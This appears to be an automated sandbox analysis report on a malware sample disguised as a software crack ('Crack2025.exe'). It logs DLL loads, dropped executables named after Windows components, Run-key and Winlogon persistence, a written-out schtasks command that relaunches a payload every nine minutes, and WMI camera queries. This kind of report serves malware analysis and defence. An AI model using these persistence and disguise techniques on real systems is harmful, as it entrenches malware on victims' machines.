                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: apphelp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: version.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: sspicli.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: version.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: sspicli.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: version.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sspicli.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: version.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: apphelp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: version.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: version.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\Crack2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: Crack2025.exeStatic file information: File size 1897478 > 1048576
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: Crack2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Crack2025.exe
                          Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.pdb source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"
                          Source: C:\Users\user\Desktop\Crack2025.exeFile created: C:\Crtsvc\__tmp_rar_sfx_access_check_6918671Jump to behavior
                          Source: Crack2025.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F640 push ecx; ret 0_2_00B5F653
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5EB78 push eax; ret 0_2_00B5EB96
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7A900BD pushad ; iretd 9_2_00007FF7C7A900C1
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7A95368 push cs; ret 9_2_00007FF7C7A95379
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7BF2E06 push ebx; ret 9_2_00007FF7C7BF2E09
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7E95BC1 push esi; retf 9_2_00007FF7C7E95BC7
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7E91595 push edx; ret 9_2_00007FF7C7E91596
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeCode function: 14_2_00007FF7C7AA00BD pushad ; iretd 14_2_00007FF7C7AA00C1
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeCode function: 14_2_00007FF7C7AA5368 push cs; ret 14_2_00007FF7C7AA5379
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AD59E1 push ds; retf 35_2_00007FF7C7AD5A0F
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AB00BD pushad ; iretd 35_2_00007FF7C7AB00C1
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AB5368 push cs; ret 35_2_00007FF7C7AB5379
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AC79C7 push ebp; ret 35_2_00007FF7C7AC79C8
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AC71AE push cs; iretd 35_2_00007FF7C7AC71AF
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 36_2_00007FF7C7AB00BD pushad ; iretd 36_2_00007FF7C7AB00C1
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 36_2_00007FF7C7AB5368 push cs; ret 36_2_00007FF7C7AB5379
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AA00BD pushad ; iretd 37_2_00007FF7C7AA00C1
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AA5368 push cs; ret 37_2_00007FF7C7AA5379
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AC59E1 push ds; retf 37_2_00007FF7C7AC5A0F
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AB79C7 push ebp; ret 37_2_00007FF7C7AB79C8
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AB71AE push cs; iretd 37_2_00007FF7C7AB71AF
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AB79C7 push ebp; ret 38_2_00007FF7C7AB79C8
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AB71AE push cs; iretd 38_2_00007FF7C7AB71AF
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AC59E1 push ds; retf 38_2_00007FF7C7AC5A0F
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AA00BD pushad ; iretd 38_2_00007FF7C7AA00C1
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AA5368 push cs; ret 38_2_00007FF7C7AA5379
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AB59E1 push ds; retf 39_2_00007FF7C7AB5A0F
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7A900BD pushad ; iretd 39_2_00007FF7C7A900C1
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7A95368 push cs; ret 39_2_00007FF7C7A95379
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AA79C7 push ebp; ret 39_2_00007FF7C7AA79C8
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AA71AE push cs; iretd 39_2_00007FF7C7AA71AF
                          Source: ComComponentRuntimeMonitor.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: Registry.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: smartscreen.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: aePhPQ5epIOPbGayHv.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: ShellExperienceHost.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: xP1x1VNeIAPjWsHHYbBFNFY.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234

                          Persistence and Installation Behavior

                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: unknownExecutable created and started: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\ZgWXldfI.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\AtYLDxzH.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\kMRvrGzk.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\tvkLaiES.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Crack2025.exeFile created: C:\Crtsvc\ComComponentRuntimeMonitor.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\SFAQXTUW.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\KbrbnaEo.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\Public\Pictures\Registry.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\Default\Desktop\ShellExperienceHost.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\ProgramData\smartscreen.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\biIGHMkD.logJump to dropped file

                          Boot Survival

                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 9 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Pictures\Registry.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Memory allocated: A00000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Memory allocated: 1A710000 memory reserve | memory write watch
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe Memory allocated: F50000 memory reserve | memory write watch
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe Memory allocated: 1AC30000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Memory allocated: AA0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Memory allocated: 1A560000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Memory allocated: 1770000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Memory allocated: 1B2B0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Memory allocated: 2C80000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Memory allocated: 1AED0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Memory allocated: 2830000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Memory allocated: 1AAE0000 memory reserve | memory write watch
